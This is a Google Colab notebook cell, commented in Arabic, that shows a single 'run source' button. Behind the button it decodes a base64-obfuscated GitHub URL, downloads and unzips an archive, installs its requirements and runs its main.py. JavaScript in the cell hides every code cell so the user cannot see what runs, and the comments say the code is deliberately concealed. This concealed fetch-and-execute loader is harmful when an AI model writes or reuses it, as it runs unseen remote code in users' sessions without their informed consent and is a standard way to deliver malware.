In [ ]:
from IPython.display import HTML, Javascript, display
from google.colab import output
import os, requests, zipfile, subprocess, sys, base64

# ====== هنا نضع السكربت كامل داخل دالة ولكن لن نعرضها للمستخدم ======
# 🔐 طبقات متعددة من التشفير (موجودة هنا داخل الدالة)

def _run_source():
    try:
        layer1 = "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1JlYWx2b2EvU2lGVGhvbi9tYWluL1NpRlRob24uemlw"
        layer2 = "ZEdWemRBUUtVMVJQVmtsVE4wRk5QVDA="
        url = base64.b64decode(layer1).decode('utf-8')

        print('جاري التهيئة...')
        r = requests.get(url)
        if r.status_code == 200:
            with open('source.zip', 'wb') as f:
                f.write(r.content)

            with zipfile.ZipFile('source.zip', 'r') as zip_ref:
                zip_ref.extractall('.')

            # البحث عن الملف الرئيسي
            for root, dirs, files in os.walk('.'):
                if 'main.py' in files:
                    os.chdir(root)
                    break

            # تثبيت المتطلبات
            print('تثبيت المتطلبات... (قد يستغرق بعض الوقت)')
            subprocess.run([sys.executable, '-m', 'pip', 'install', '-r', 'requirements.txt'])

            # تشغيل
            print('تشغيل main.py ...')
            subprocess.run([sys.executable, 'main.py'])
        else:
            print('خطأ في التحميل — status code =', r.status_code)
    except Exception as e:
        print('حدث خطأ:', str(e))

# نسجل الدالة كـ callback يمكن استدعاؤها من جافاسكربت الواجهة
output.register_callback('notebook.run_source', _run_source)

# ====== إظهار زر وحجب جميع مدخلات الخلايا (لإخفاء الكود عن العرض) ======
html = '''
<div style="display:flex;gap:10px;align-items:center">
  <button id="run_source_btn" style="font-size:18px;padding:8px 16px;border-radius:8px;">▶ تشغيل السورس</button>
  <span id="status" style="font-weight:600;color:#444;">جَهِّز لتشغيل السورس</span>
</div>
<script>
  const btn = document.getElementById('run_source_btn');
  const status = document.getElementById('status');
  btn.onclick = async () => {
    btn.disabled = true;
    status.textContent = 'جارٍ التحميل والتشغيل...';
    try {
      // ننادي الدالة المسجلة في البايثون
      await google.colab.kernel.invokeFunction('notebook.run_source', [], {});
      status.textContent = 'انتهى التنفيذ.';
    } catch(err) {
      status.textContent = 'حدث خطأ أثناء التنفيذ.';
      console.error(err);
    }
  }

  // نخفي كل مداخل الخلايا (input areas) حتى لا يظهر الكود
  try {
    document.querySelectorAll('div.input').forEach(el => el.style.display = 'none');
  } catch(e) { console.warn(e); }
</script>
'''

display(HTML(html))

# تلميح: إن أردت إظهار المخرجات فورياً (stdout) فسيظهر في الأسفل عند التشغيل
